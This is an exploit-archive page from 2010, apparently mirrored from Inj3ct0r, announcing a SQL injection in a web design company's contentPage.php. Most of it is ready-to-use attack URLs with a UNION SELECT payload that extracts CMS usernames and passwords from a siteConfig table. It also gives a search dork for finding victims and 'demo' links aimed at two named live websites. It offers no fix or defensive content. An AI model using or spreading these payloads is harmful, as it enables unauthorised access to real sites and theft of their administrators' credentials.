Home / os / win7

milehighcreative Design's (contentpage.php) SQL Injecti

Posted on 28 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>milehighcreative Design's (contentpage.php) SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================================================
milehighcreative Design's (contentpage.php) SQL Injection Vulnerability
=======================================================================


#######################################

[+] milehighcreative Design's (contentpage.php?id= ) SQL Injection Vulnerability

[+] By newbie_043

[+] Published: 2010-05-28 Pukul 23.00 WIB

[+] jatimcrew.org
#######################################
# Script Homepage: http://www.milehighcreative.com/

[+]Dork: info@milehighcreative.com

[+] SQL Injection


http://[target]/contentPage.php?id=[SQL]

http://[target]/contentPage.php?id=-9999+and+1=0+union+select+1,concat(CMS_username,0x3a,CMS_password),3,4,5,6,7,8+from+siteConfig/*

demo : 

http://www.shv.com.au/contentPage.php?id=-9999+and+1=0+union+select+1,concat(CMS_username,0x3a,CMS_password),3,4,5,6,7,8+from+siteConfig/*

http://www.dromanatouristpark.com.au/contentPage.php?id=-9999+and+1=0+union+select+1,concat%28CMS_username,0x3a,CMS_password%29,3,4,5,6,7,8+from+siteConfig/*


##########################################


#Thanks to : byz9991,darkavanger,doraemon,newbie_campuz,unixcode,bom2stalker,phoenixhaxor,xcyberx,roentah,all member of jatimcrew

##########################################



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :